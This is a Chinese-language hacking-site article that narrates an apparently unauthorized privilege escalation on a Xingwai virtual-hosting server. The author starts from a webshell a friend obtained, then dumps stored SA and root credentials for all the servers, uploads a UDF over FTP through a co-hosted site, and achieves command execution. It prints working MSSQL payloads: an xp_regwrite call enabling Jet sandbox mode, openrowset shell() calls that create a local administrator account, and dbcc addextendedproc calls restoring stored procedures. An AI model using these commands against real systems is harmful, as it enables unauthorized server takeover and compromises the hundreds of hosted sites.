首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>入侵实例>文章内容
记星外主机提权的曲折过程
来源:vfocus.net 作者:天使之翼 发布时间:2010-11-23  
今天朋友丢了个星外主站的SHELL过来
不知他是怎么搞的,权限都设置得都NB 什么组件都删光光了,只支持ASP 汗的是全部没写入和修改权限,都不知道那Y是怎么拿到SHELL的
不光是这样,他的马都有点问题,使用起来都不爽,
还好,在Global.asa 找到了数据库连接文件 ,不是SA   不过密码和SA的一样   本想可以直接提权了,没想什么组件都删了,而且用这个SHELL不习惯
又执行不了命令,SHELL也没写入修改权限,,头大,, 之后直接用SHELL自带的SQL连接一下
看看里面的表什么的,查了查
SELECT * FROM [FreeHost_Serversqllist]
这个表得到一些数据


他所有服务器的SA ROOT账号 包含本机的,这下好了,,,有戏,不过高兴了早一点,,,接着想UDF提权,不过没写入权限,晕
怎么办,想了想,查他上机开通的主机看看,说不定他不是独立服务器,,
SELECT * FROM [FreeHost_Product_Host]


看了一下   站不多,只有300多个   仔细的找一下,,找到同服务器的   这下好了,星外主目录没写权限,我直接从FTP下手,,找了个站   用FTP传了UDF上去   本以为就此搞定,结果郁闷了一下     UDF不能导出
我想应该是降权了 在群里问了一下,,好你星外的权限配置得比较BT   没办法了
搞了1个多小时   ,没搞下郁闷
其实是我走了弯路了   回想下   记得可以用SA沙盘提权
就接着试   不过什么xp_cmdshell等组件都删了
头疼   百度YY一下找到了恢复XP_cmdshell的,不过执行一下不成功   不知道为什么,,后来才发现是马的问题
沙盘就没去看了, 不过百度找到一个新方法

SA下不用恢复xp_cmdshell和xplog70.dll也执行命令

http://www.4shell.org/archives/242.html

在这种情况下,要执行命令,条件是要有xp_regwrite。

首先开启沙盘模式:

exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1


然后利用jet.oledb执行系统命令

select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin /add")')
select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\windows\system32\ias\ias.mdb','select shell("cmd.exe /c net localgroup administrators admin /add")')


试了下不成   在找到
dbcc addextendedproc ('xp_regread','xpstar.dll')

dbcc addextendedproc ('xp_regwrite','xpstar.dll')

恢复了一下,,,成功了 这样提权成功
不过失误了一下 在加管理组的时候
写错一点命令   以为他管理级改了,,忙活半天   才发现

本人文采不好,,,,写了半天发现上面的文字YY的我看得都头大了
http://www.4shell.org/archives/242.html
http://www.4shell.org/archives/1718.html
这是找到的两篇文章   希望对大家有用了,
秀下成果吧


文章作者:天使之翼



 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·另类网站入侵之一句话木马图片的
·0day批量拿站webshell,挖掘机是
·利用ewebeditor 5.5 - 6.0 鸡肋
·OmniPeek抓包的一点看法
·强大的嗅探工具ettercap使用教程
·Windows系统密码破解全攻略
·破解禁止SSID广播
·XSS偷取密码Cookies通用脚本
·XSS漏洞基本攻击代码
·Intel 3945ABG用OmniPeek 4.1抓
·KesionCMS V7.0科汛内容网站管理
·破解无线过滤MAC
  相关文章
·入侵成人用品购物网站
·常用的Churrasco,pr,ms10048,
·DB-OWNER权限日志备份专用一句话
·Cisco Router Backdoor -- TCL S
·mssql数据库注入时exec xp_cmdsh
·一次欺骗带来的血案--入侵实录
·典型性社会工程学渗透实战(图文
·艰难渗透源码出售站点(图文)
·社会工程+老式提权艰难渗透某通
·对搜狐、网易和TOM三大门户网站
·星外虚拟机系统(星外虚拟机提权"
·利用ewebeditor 5.5 - 6.0 鸡肋
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved